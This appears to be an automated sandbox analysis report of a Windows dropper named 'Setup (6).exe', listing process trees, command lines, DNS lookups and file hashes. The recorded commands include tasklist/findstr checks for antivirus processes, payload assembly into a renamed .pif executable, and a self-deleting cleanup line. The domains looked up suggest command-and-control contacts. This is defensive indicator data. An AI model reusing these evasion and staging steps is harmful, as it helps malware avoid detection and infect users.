PID 1696 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1696 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1696 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1696 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1696 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1696 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1696 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1696 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1696 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2260 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2556 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2168 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2168 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2168 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (6).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Northeast Northeast.cmd & Northeast.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 328159

C:\Windows\SysWOW64\findstr.exe

findstr /V "EnclosedVisibilityDuringBrilliant" Peter

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Urge 328159\g

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

328159\Prototype.pif 328159\g

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif" & rd /s /q "C:\ProgramData\HJJEHJJKJEGH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

Network

Country Destination Domain Proto
US 8.8.8.8:53 HHdFGUjAaebMiQpHnNQPUq.HHdFGUjAaebMiQpHnNQPUq udp
US 8.8.8.8:53 theemir.xyz udp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 steamcommunity.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Northeast

MD5 b45202591b60b052447886eb104577f0
SHA1 afa16d62ffd59c86e63e8dd3060baf34a57e7cf1
SHA256 997fc2668f5943d35d2b435e4270a2576b2ef275710f885066a25cc9cd1213e0
SHA512 9d0496c339dfa022115959cbe86ede08ee7f8f97bae31aa5b2e4af63768e4032b526745197bcce5104c2de983f58a9932827481b76c09addade6074c89f14775

C:\Users\Admin\AppData\Local\Temp\Peter

MD5 8bf9404a2322b0a2bcd19382cf90ebc2
SHA1 ac84d7e0ef6aedeb925b53dbd10a085be6760cec
SHA256 1d04056759eef1c0e886bde0d53277f2e248e1f3158f08158151ed27a74efcdc
SHA512 6df401889e198484dfbf03e94eb408fea6dcb3cf9470457f42c16795d4660f906ecbcbcde2ec0c44f3261a839b9137e6050035d656236f5f9164b3239ba881a8

C:\Users\Admin\AppData\Local\Temp\Showers

MD5 de37f7dfee32a6745cad440181cc795e
SHA1 69bd1675df2b06946e0d5da452b5c0d808e76ebd
SHA256 1692192f6fbe9a0757027029c9773196ec6bfb53781336a9164e66510b9de5cc
SHA512 a6a44be54cc0c00904a058808237700a223d78254e6ef1c844f6beb66ec5d17955a47757f8cb039571c7b1da213f5c39e5be54112bb6a772bdcce4e1403376ae

C:\Users\Admin\AppData\Local\Temp\Donor

MD5 165c9fef67a01106cb4a15a8f73ff06e
SHA1 94b530edfc27c9010871d96c4eccd1c3e0708c9f
SHA256 a69c145a5b5b20eb93b7d82e9440d7a0beba53072b83ecc4cddb9e2137a9fe96
SHA512 0648396ae2e4cc86db49b2e3980affa69ddf4b0b607ac5aa80c0611b3df5dac415653a94486cb2eb05d00a1eed680b547d58f489d62f6a2d19f0d910e2a82f42

C:\Users\Admin\AppData\Local\Temp\Eleven

MD5 b8e5f0ae5af9b75bf009885a32a042cc
SHA1 88c1820f1ba8065871ffdc250a8a0463887dddb8
SHA256 2e83d333c7566963ce675a32b42a6c4b99a907ca2c34c1a8213730e4ad461a24
SHA512 b1b699f38efe9e5794325aeed1758e0492eff6c5e8539412d66e185ab1d2b1cdb2301210278e7658b25dd04d70b13c010d1f92d8476e34d23b9efa5983851005

C:\Users\Admin\AppData\Local\Temp\Johnston

MD5 103d119aa8a89d75d8d087599c321fe9
SHA1 f38f558952f028f3b64b758d2a6570d09d25eb5f
SHA256 d85b39bc6ef094b7a7d4247b5eacb44f1f32ea887614324f5fa882ff61f0bbcf
SHA512 32dddd0981a9ce9404ecd1224fd57e5f65e4110946d21c911ef5e726d285a398ba4e1b86b1f95511edf55689ff80a21804724593e44a1646e248b694d6c54be6

C:\Users\Admin\AppData\Local\Temp\Piss

MD5 93131f960f434fa2c6ed8310b80c952c
SHA1 c5fb6e077d03598457031585793381ae1abab8df
SHA256 c1376889ec8b5cd3e710146be003a3ff51940d6a7e1cb943b8c5c04a7da98e40
SHA512 ed67a586f73b5f1773f5b312436275a30fc26c936f368926ee295c0508f7bc02d34b5c049f6a51d2f6937fd7b4341680038bd0a2f1d03a7a07a404ef58244cbb

C:\Users\Admin\AppData\Local\Temp\Brass

MD5 cfbeb50abeb4b45cae9a85881deafdeb
SHA1 a2679acd6055a0bf07fc34a38cf92df1d8b47bcb
SHA256 93406ff30fe7c1a9f8300d4ed6097b15515fa2b421f09b32e9c3b44f71d85b10
SHA512 f46734ab6e917a213a5083f69a5f41b823bc0687b6f77e84cb1016183c74c1af0331c431b9655fc368cb4bfaec16a7284cdcc4f3be2880306f7aadfcef5739f8

C:\Users\Admin\AppData\Local\Temp\Thong

MD5 e85daf9e828a54404f20e99b13b50fb1
SHA1 c4596f5531659d2d985ab07f8a83b5bf7046c7ad
SHA256 02ae86086ce07d7fa62afb52a7cb300b7aab300293740a218427245fe249a16c
SHA512 8eca39efccbe97fad55665c48f39ddb0b1fb3f8d25daaf076b36fb5f01f925752150ac2e15939f82b9987f88859148aa425850a581018fbb2283bbf6f752f0d2

C:\Users\Admin\AppData\Local\Temp\Accredited

MD5 5fe6dff8f4824b74d5b55b91234d2ad2
SHA1 4ff5c6aa348c63720a951cf2ae797786b7f7d53b
SHA256 d8b24570072e032030d6f4dcf403e056a33334eb1c77e7497a46dffbac44338e
SHA512 0f18eacd293524086086ecd8a06c387ffdcfa14bf613637bf33ceaf6071b7dfecf03d803a038271c7271bdecf42979358fb0d99b5141d83cc5d2e1c603a11173

C:\Users\Admin\AppData\Local\Temp\Verify

MD5 d2c6e84f2b8208dcef9027b697736a87
SHA1 23807b3fdfa56512273b22677ed1742ca1d97f67
SHA256 28b9354f9812c980d345d9fca164458e5745c2f41b03fc17f26f5c9070ae4ab2
SHA512 f12efe8547372048f5a4e6ab1b17eb2c0c7edb5e6d2c7a494e80a90b800f0e365555f7e9ef84950ae3807abf8179f13d718885f349198c1f7ac26bb9cc62de29

C:\Users\Admin\AppData\Local\Temp\Rivers

MD5 fbc978cdd7879bb3177a5951b9ebc202
SHA1 a79984bfe14dbbcf273caac437e4ff853085cb94
SHA256 a48c0359f7a95e765b0759998d444bcf05848df6d70d49f216d73ad24520e9ed
SHA512 8f7e1cb2f65b94f1d35796b7845208566b0e7c685f53cdb3c67373871b906cdc4cc58043ac51073ceea335c7c0db155a91a0fff380adde8066cd39e3248e747c

C:\Users\Admin\AppData\Local\Temp\Monetary

MD5 fb207dd3daae6d70329b147cd27629f8
SHA1 31b24557f3a38fc2a6fac2356b9c84560f5a7eb4
SHA256 55e4055a761f6de72b67f65a7a9ef4aa904be7dbbd414dadfa1c2924f1f1c73d
SHA512 d615075db7f6b5019f04a78c7b8fcc090176821e5280be486cb5bc464fd7640db7c5ed3dfb9bbd807ac31b165945b7d49b4cc6fc0fce712f5f290c4b70f056e5

C:\Users\Admin\AppData\Local\Temp\Trials

MD5 b61d86bf3beffab4d100c221f8b5d505
SHA1 7aaf57112aaddb0e6bda53e9881f88806917b44d
SHA256 544daa4eebc82abd4e6de0db4d74eaac30674206bb24249dad032a5440a9ed0c
SHA512 d0a40173e2df3569aaf25b5747b583651ef2c0eb54e0be79e71244cf9e7fecfa705f835d7dea2c97f2cb9f9523f9f8712f7b60ad1cd0a0dd43ae4dcac010e6fd

C:\Users\Admin\AppData\Local\Temp\Min

MD5 84b5cbc02b6784b589a1e732fab2eb11
SHA1 047cf1a36b734bdd2dd6c6be37e31c57eb801bed
SHA256 99a173e0ef78baefcf23c7e91d3420bd337d3cbd6f5438247108f99bdbca2314
SHA512 cae10222a0aad3771afd4d048d975fc7e187fc470bdb0cb1eba96eb8a7e4a6b03a00ad5ff1a8fcd0ff07ac3232fbdd8f0f28076b3d61950218ebfac8991e019b

C:\Users\Admin\AppData\Local\Temp\Costs

MD5 e2da627e46f2a55408826eb2594fb43b
SHA1 c19e0b76395ef2925773aebc0a50a321767969f9
SHA256 ebb816fcde52ecfa80be03363350a879aa8d01a894ab4a920fe77185e74e561c
SHA512 5329a74fe6b7f76742fda2cb83d26fc7201da7cf8e473a4124c5976351d3df520ab001f8caeef809f6f16314ad722bd0329470745b5f7bee436235f682639556

C:\Users\Admin\AppData\Local\Temp\Level

MD5 a4dadb8a544a089b4aee4a5748aaf235
SHA1 0104d996bec6261067d544dc3350e00708be80bf
SHA256 9ea4dba08ff6119c3f8615527df474e335d54c07c010498eb9b4490e5a9e5c2c
SHA512 63ba6ea32f27bfcbb698e10d8709a841046a72a2bf78f26ea8d3a4b862dfd3aee1d416cec22b5c79b34a2c2bb5e5f2da1020889f1c9b6143f0a4f9bf6e9af71e

C:\Users\Admin\AppData\Local\Temp\Beach

MD5 5941c44b1fc2813ab474e88e9106c241
SHA1 a328363081d9ffd7e14413ed7cd7af75b3d42368
SHA256 661b5c7db73b2a3e8b9a20e7b54d26b73b8a3463b9387d8675d399fd1a8d8bad
SHA512 19b0d470bcb7b19ad589231f6d03db62eef4e66b3eb8d0d87a4c1dce20bad8f404ecb703250f55e8bfdc1429d59008524a5f687c47e36504b68fd70a281cb427

C:\Users\Admin\AppData\Local\Temp\Spirit

MD5 45b7c6db4c4212296c0f409e050f497f
SHA1 085ac7a8e2a695186cfe5c43a3e6db58588f91ce
SHA256 f55b826fa11826340d240a7df59c94c3ae34bc2b209a54ec6c19757ae8b0f1a2
SHA512 65ddef8c13450a27cb55ab4fde8da3b5526547f704950bd85c3854d223ab22624e5d11c08750baa5e603a9ef7254fdd6a9209548dbba824577c8b4ab6d304c0d

C:\Users\Admin\AppData\Local\Temp\Connections

MD5 1bf949f7fd95cff659a03139086f7d87
SHA1 b712712a2944c32875c48d010a3301188ba90d14
SHA256 7d8ad83805f6d996e0dd9fd6f41c4f4195049dc1dbc836a0c524e68685e8cb49
SHA512 a66c1abad745ae88b1a94d94c2a4a1e7a37985d19fe9d36efdc9ec1aaa2883a5409c91c0b37c901864d72ae616da86cfdabedfb0ccfa695804fc0715d1ac5130

C:\Users\Admin\AppData\Local\Temp\Penguin

MD5 888388580b16210569adcef464f2327e
SHA1 3c98fa3319589c23e26e11b078072ebaa5de1b76
SHA256 b6903261df9e0ea6aa198c7e7b41472057fe22d751588c115ec938d3e42dfc13
SHA512 288ccbac5cc5db5127a9d280ca4771e136396a98a1ac0ce601ac2e688a15e00507f00db84689a99ee1a649ec0774eeb4b522374c41b8983a8a7bdf2c3089e2f1

C:\Users\Admin\AppData\Local\Temp\Volleyball

MD5 24e47a1999e17f9f0f259fcdacd4df25
SHA1 ed7c655c0c386eb7dd63613a1004b9425e2d7977
SHA256 ba73de3122a0bf1c500b19be79793b7fe18a28db957524e6e85f48953f453007
SHA512 63066255479c7cd33bdae5571eb27c608580290a14fa5804f78748dd4d0f787794009cd085f3f30b4f9e068e233a1939390f1ed0550e4bd8d28d9a2b4e09f8ea

C:\Users\Admin\AppData\Local\Temp\Initiative

MD5 68d718bc0a5b98e7003a1ee5dafe1210
SHA1 6b0c348a4ae6e734de65a05649ec18e9ba183e7d
SHA256 15f7faefcd8d2c2aceaf1da0f3b8b5ac7db4d868eced2b999ccc42bb579f83c4
SHA512 086873e11b7083afc236aba4d817b638f40df25b5bc4af50963d0fc01808735c60b54d6cbb56e11624cc61309ae95b0ccf906a487051f98150fef0fbf75c7252

C:\Users\Admin\AppData\Local\Temp\Miss

MD5 0829f71740aab1ab98b33eae21dee122
SHA1 0631457264ff7f8d5fb1edc2c0211992a67c73e6
SHA256 9f1dcbc35c350d6027f98be0f5c8b43b42ca52b7604459c0c42be3aa88913d47
SHA512 18790c279e0ca614c2b57a215fecc23a6c3d2d308ce77f314378cb2d1b0f413acd3a9cd353aa6da86ec9f51916925c7210f7dfabc0ef726779f8d44f227f03b1

C:\Users\Admin\AppData\Local\Temp\Broker

MD5 4a73cbddfd3263424187b29dd0356182
SHA1 c14e63ee586e70134fa24432b6d3966ff483b78a
SHA256 6090a3dc60ec7a84c1c946c62c024b422c6bd116fd15d763e9fe59072b838627
SHA512 ff03ffe59016a8f1b08c0fca64a29a748034d4f5933e36b1e5d359a9b60e5499f2575ce9e1bccf80dd368c20c4f38fbd3f3425c1ef799dd993076c67fa0e32e8

C:\Users\Admin\AppData\Local\Temp\Ali

MD5 716407bf663adacaef5d04814488026c
SHA1 12499ea9481fb26bc58ab34f1295d83d5855b424
SHA256 04f0ca51092b541a82289d054ada19e52c40da4434b827f03b6b7b70766abc30
SHA512 84bcd384bbd5dd4535015e82a1ed799135d86633ccfebad36f0f399e2e1b02c140259e223d18c81e6b4bb8d1f774b7b03d7e30acb2ec6727b39de79363d8e98a

C:\Users\Admin\AppData\Local\Temp\Camel

MD5 7d82d3900c8ba40cf122071c37f0cf9c
SHA1 0008970f1a960a8fdfe55b678a5f9b45048f8e0e
SHA256 af9abccf8d3abc3abb9820f19e7aa6bd603d1f47ce5a7aba58a2b5e5e55ed7cf
SHA512 efd0d18903d1cfb9d1bd3b6103924a743bd8da38c2e00a9367f079ea5140f5df6b82d424aa2129e0e095bc48eaf038f89d90db23fb914723ca9b4cfce48a5a87

C:\Users\Admin\AppData\Local\Temp\Mauritius

MD5 ba27e2d8c8494f275c741457bc15f533
SHA1 42468740d544b6785068d47f4587b36109b6f519
SHA256 1beb1b2c2af505ac359cf66ee6895b645480238bd5f40cee072fc85b0019f24d
SHA512 96f48e59f26b89564269265a3acd29ba5645ffdbe153e3c4fbaad84785bd97ede9a49931d0c3ae909fc27e18e680bf7f879ad5332183e706ce58f1da79300aa6

C:\Users\Admin\AppData\Local\Temp\Salvador

MD5 c9bdd9c82c3ed58946eba402b537c847
SHA1 9564a227f3950a0898437476c224886579369678
SHA256 600d9d7edda40ee5bf3c6bee9987b2c288f547c33637ef72a23a831708f4dfdb
SHA512 ff40cc3cc18364bbf7bdde8f525b7bc23e669513c743d8acf58b45671c119aca279a554727c1e200cc146ea90ffe19330a65bb992065c820520bafd475a0a6fa

C:\Users\Admin\AppData\Local\Temp\Al

MD5 2332eef605c2bf44201d0f839155b887
SHA1 bb92bc1b42b4d1799c0c7f551a04137ffa280c69
SHA256 521a256a47610774a9eb2fa85441789d7e595ca9f662e074042ec9df12fa66f3
SHA512 388fe1ea427cf3c4b3b85e22ae8e6bf034f457682fba6b0ab82a113a2589754d1b1d8d6fbddd70f79f007036b3bc7750c89d190fc96ff70dd3ce4f97724e47aa

C:\Users\Admin\AppData\Local\Temp\Urge

MD5 b4164811733d945f464aded1dcd862fa
SHA1 238bfcc1dca54e80ababa6676d21bf12894ecba5
SHA256 755f1572c8f0e5e9ef789774dace4faae388fbd4380c5f99d5f073009fdbed01
SHA512 d4ab05cdedc215e6185b7b959e1951011346345071c69f3237c2fd0a0eefd4e8c0a792538b5d1e2a5ab8e8c2598ace162ed66be0bb94f10de7aa49790facc727

\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2556-368-0x0000000000730000-0x0000000000E7A000-memory.dmp

memory/2556-369-0x0000000000730000-0x0000000000E7A000-memory.dmp

memory/2556-371-0x0000000000730000-0x0000000000E7A000-memory.dmp

memory/2556-374-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2556-373-0x0000000000730000-0x0000000000E7A000-memory.dmp

memory/2556-372-0x0000000000730000-0x0000000000E7A000-memory.dmp